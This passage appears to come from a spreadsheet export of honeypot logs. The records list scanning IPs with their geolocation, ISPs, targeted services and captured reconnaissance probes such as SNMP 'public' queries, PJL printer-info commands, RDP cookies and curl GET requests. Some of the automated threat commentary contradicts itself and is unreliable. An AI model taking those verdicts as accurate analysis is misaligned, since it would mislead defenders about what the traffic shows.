(,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f5:470d"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze potential malicious activity."/>
    <s v="Port Scan"/>
  </r>
  <r>
    <x v="702"/>
    <x v="702"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T02:11:57"/>
    <d v="2024-12-27T04:03:35"/>
    <d v="2025-04-27T02:11:57"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fc:32da"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze. &amp;&amp; There is insufficient log data provided for analysis."/>
    <m/>
  </r>
  <r>
    <x v="703"/>
    <x v="703"/>
    <s v="NA&amp;&amp;125-229-131-113.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-27T02:11:27"/>
    <d v="2023-10-23T10:29:18"/>
    <d v="2025-04-27T02:11:27"/>
    <n v="490"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;3306&amp;&amp;55533&amp;&amp;23&amp;&amp;6111&amp;&amp;58497&amp;&amp;80&amp;&amp;9100&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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:8371"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="704"/>
    <x v="704"/>
    <s v="divine.probe.onyphe.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-27T02:04:49"/>
    <d v="2023-09-02T03:09:00"/>
    <d v="2025-04-27T02:04:49"/>
    <n v="964"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_RDP_H17&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_RDP_H46&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_RDP_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3389&amp;&amp;22&amp;&amp;3377&amp;&amp;5900&amp;&amp;33358&amp;&amp;54562&amp;&amp;44556"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="HDF"/>
    <s v="Hauts-de-France"/>
    <s v="North"/>
    <s v="Roubaix"/>
    <s v="2982681"/>
    <s v="59100"/>
    <s v="50.6917"/>
    <s v="3.2015700000000002"/>
    <s v="16276"/>
    <s v="OVH SAS"/>
    <s v="OVH SAS"/>
    <s v="hosting"/>
    <s v="OVH ISP"/>
    <s v="2009-06-05"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bca5:f390"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No VNC activity was detected, indicating potential attempts to exploit or scan for vulnerable services that use Virtual Network Computing protocol. _x000a_However, the lack of VNC activity could also be due to legitimate reasons._x000a_This might imply a scanning or probing attempt. &amp;&amp; No VNC connection attempted. _x000a_There is no indication of malicious activity. _x000a_This log entry suggests that there were no notable attempts to access or exploit VNC service during this time period. &amp;&amp; No RDP activity was detected, indicating normal service operation or lack of malicious attempts to access it. This could be due to an absence of potential attackers or proper security measures in place. No suspicious traffic was observed on this service."/>
    <s v="VNC Attack &amp;&amp; RDP Bruteforce"/>
  </r>
  <r>
    <x v="705"/>
    <x v="705"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T02:01:50"/>
    <d v="2025-04-27T02:01:50"/>
    <d v="2025-04-27T02:01:50"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:b94f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible brute force attempt or probing for a telnet service, likely scanning for vulnerabilities or trying to gain unauthorized access. No activity detected as the service is not active according to log data, suggesting potential malicious intent was thwarted. Inactive service poses no immediate risk but may indicate ongoing reconnaissance efforts. &amp;&amp; No attempt was made to connect or interact with the telnet service, indicating no malicious activity was detected via this method. However, it's possible that the connection was blocked by a security measure before any interaction occurred. This could also indicate the service is currently inactive."/>
    <s v="Port Scan &amp;&amp; Telnet Scan"/>
  </r>
  <r>
    <x v="706"/>
    <x v="706"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T01:43:41"/>
    <d v="2024-04-11T08:59:00"/>
    <d v="2025-04-27T01:43:41"/>
    <n v="382"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_FTP_H6&amp;&amp;SMA-LAB_NTP_H44&amp;&amp;SMA-LAB_POP3_H25&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_ORACLE_H31&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_SIP_H46&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_NTP_H7&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_FTP_H3&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_NTP_H26&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_SOCKS5_H23&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_SOCKS5_H38&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SIP_H28&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_IMAP_H20&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_SNMP_H33"/>
    <s v="53&amp;&amp;161&amp;&amp;51678&amp;&amp;1521&amp;&amp;389&amp;&amp;23&amp;&amp;143&amp;&amp;51147&amp;&amp;110&amp;&amp;3389&amp;&amp;NA&amp;&amp;1080&amp;&amp;9100&amp;&amp;5432&amp;&amp;6379&amp;&amp;37534&amp;&amp;443&amp;&amp;54471&amp;&amp;3306&amp;&amp;1433&amp;&amp;56194&amp;&amp;5900&amp;&amp;51459&amp;&amp;52831&amp;&amp;51673&amp;&amp;6667&amp;&amp;21&amp;&amp;52034&amp;&amp;445&amp;&amp;56351&amp;&amp;54977&amp;&amp;80&amp;&amp;49487&amp;&amp;55932&amp;&amp;55871&amp;&amp;50933"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="103"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="query&amp;&amp;connection&amp;&amp;request&amp;&amp;stshash&amp;&amp;command&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rleiOFrhR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fvOIRt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sCGLbW'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58886)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58890)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58902)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63416)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63418)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63432)}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,62340)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,62342)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,62350)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58090)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58102)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58108)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63550)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63554)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63564)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VzJNMaAod'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GYicqK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gDIAzu'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lnCZsdZdF'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:1863"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible malicious activity is an unauthorized printer remote management attempt with the goal of gathering information from the target system. The attacker is likely trying to extract sensitive details about the system's configuration and capabilities. This could be a reconnaissance step before further exploitation. &amp;&amp; Malicious printer exploitation attempt detected, attacker trying to retrieve device information through unauthorized print job submission. This is a common tactic used by attackers to gather sensitive data about the target system. The attacker may use this information for further attacks or exploits. &amp;&amp; This suggests an attempt to retrieve printer information, possibly as reconnaissance for further exploitation. The use of a non-standard command could indicate malicious intent. This may be a precursor to more serious attacks on the network. &amp;&amp; Possible malicious activity involves an attacker attempting to exploit printer configuration vulnerabilities by sending a command that could allow unauthorized access or control over the system's print settings and functionality. This is typically done as reconnaissance prior to more significant attacks, or it can also be part of a broader phishing strategy aimed at employees with elevated privileges to print services."/>
    <s v="FTP TLS &amp;&amp; Tls Auth &amp;&amp; Printer Scanning &amp;&amp; PortScan &amp;&amp; Print Job Lure"/>
  </r>
  <r>
    <x v="707"/>
    <x v="707"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T01:40:09"/>
    <d v="2025-04-27T01:40:09"/>
    <d v="2025-04-27T01:40:09"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Kartal"/>
    <s v="743932"/>
    <s v="34860"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:51b:96ca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="708"/>
    <x v="708"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T00:19:29"/>
    <d v="2025-04-27T00:19:29"/>
    <d v="2025-04-27T00:19:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="AMAZON-AES"/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dd9:6d1d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze any malicious activity. &amp;&amp; No log data provided, therefore no analysis can be made about possible malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="709"/>
    <x v="709"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T00:16:58"/>
    <d v="2023-11-24T17:15:11"/>
    <d v="2025-04-27T00:16:58"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="63458&amp;&amp;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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:4833"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity was detected during this monitoring period, which is unusual as most systems allow some form of network connection. This suggests an attacker may have attempted to connect but was unsuccessful or blocked. Lack of TELNET activity could be indicative of a targeted attack attempting to evade detection. &amp;&amp; No TELNET activity detected, possible scan or probing attempt to identify vulnerable services. No malicious connection established through this service. Normal activity indicates no suspicious behavior detected."/>
    <m/>
  </r>
  <r>
    <x v="710"/>
    <x v="710"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T00:09:41"/>
    <d v="2025-04-27T00:09:41"/>
    <d v="2025-04-27T00:09:41"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_HC1"/>
    <s v="5900"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
